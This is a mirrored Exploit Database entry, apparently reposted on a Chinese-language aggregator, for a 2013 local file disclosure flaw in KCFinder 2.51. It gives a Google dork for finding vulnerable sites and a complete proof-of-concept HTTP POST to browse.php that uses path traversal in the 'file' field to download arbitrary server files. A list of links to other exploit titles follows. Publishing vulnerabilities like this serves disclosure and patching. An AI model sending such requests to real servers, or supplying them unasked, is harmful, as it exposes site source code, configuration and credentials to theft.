KCFinder 2.51 – Local File Disclosure

Exploit Database
10 阅读

作者： DaOne

日期： 2013-08-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/27597/

---------------------------------------------------
# Exploit Title: KCFinder Local File Disclosure 
# Author: DaOne
# Vendor Homepage: http://kcfinder.sunhater.com/
# Category: webapps/php
# Version: 2.51 + old versions
# Google dork: inurl:kcfinder/browse.php
---------------------------------------------------

[#] Tested on their own demo...

-PoC-
POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
Host: server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

dir=images/Photos+from+Bulgaria&file=../../../index.php

last Exploits
KCFinder 2.51 – Local File Disclosure的更多信息

mooDating 1.2 – Reflected Cross-site scripting (XSS)：
SQLiteManager 1.2.4 – Remote PHP Code Injection：
Daily Tracker System 1.0 – Authentication Bypass：
e107 CMS 0.7.19 – Cross-Site Request Forgery：
TradeMC E-Ticaret – SQL Injection / Cross-Site Scripting：
Royal Event Management System 1.0 – ‘todate’ SQL Injection (Authenticated)：
Sonicwall 8.1.0.2-14sv – ‘extensionsettings.cgi’ Remote Command Injection (Metasploit)：
sX-Shop – Multiple SQL Injections：